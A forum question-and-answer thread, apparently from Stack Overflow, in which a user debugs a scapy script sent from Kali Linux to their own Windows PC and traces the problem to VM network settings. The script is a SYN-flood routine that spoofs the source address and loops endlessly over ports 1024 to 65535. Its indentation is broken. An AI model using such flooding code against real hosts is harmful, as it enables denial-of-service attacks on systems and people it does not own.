# Forwarding packets to windows

Tags: linux, wireshark

I wrote a code to send a packet from my Kali Linux machine to my Windows PC but the packet doesn't show in Wireshark. There are no errors in the code and it sends the packets but they are not received.

Any one can help ?

```
#!/usr/bin/python

from scapy.all import *    
def synflood(src,tgt,message):
for dport in range(1024,65535):      
    IPlayer = IP(src=src, dst=tgt)
    TCPlayer = TCP(sport=4444, dport=dport)
    RAWlayer = Raw(load=message)
    pkt = IPlayer/TCPlayer
    send(pkt)

source = input("src: ")
target = input("targert : ")
message = input(" load : ")

while True:
    synflood(source,target,message)
```

Comment: I think the problem is with line 47 of your code.

Comment: You'll have to give a lot more information to get an answer to this question. 1. can you edit the question to add the code that sends packets 3. are there any errors when you run the code 3. why do you say the packets are sent if they don't even appear in wireshark?

Comment: sorry it's not formatted there are no errors in the code and i'm saying it's sending the packets because in the terminal it shows that the packets are being sent

Comment: Good show, following suggestions and including your code! pluse-uno from me. And looks (below) like you've solved your own problem. Good show again! ... Just remember that readers can't guess what code you have. The ideal Q on S.O. is code readers can copy/paste into their own environment and have the evidence of your problem. Read [mcve] although it is rather abstract and (IMHO) lacks examples that would help new members. Good luck and keep posting!

Answer (score 0):

Update: So i fixed the problem! i tried replacing the for statement by "dport = 80" and for the target IP i chose another dest IP than my pc aand it showed up in wireshark, that's how i realised that i should configure an internal VM network instead of the bridged one , and it worked

Comment: Sorry, can't upvote this yet. Please update and show the full code that is fixed. Maybe even a comment next to the fix. Use the `{}` tool from the Edit menu on mouse-selected text to format as `code/data/requiredOutput/ExactErrMsgs`. If you didn't know, you can accept your own answer after 48 hrs and gain valuable reputation points! Good luck.

Comment: the error was not in the code it was in the virtual machine configuration, i just posted cus i needed help but thank you so much !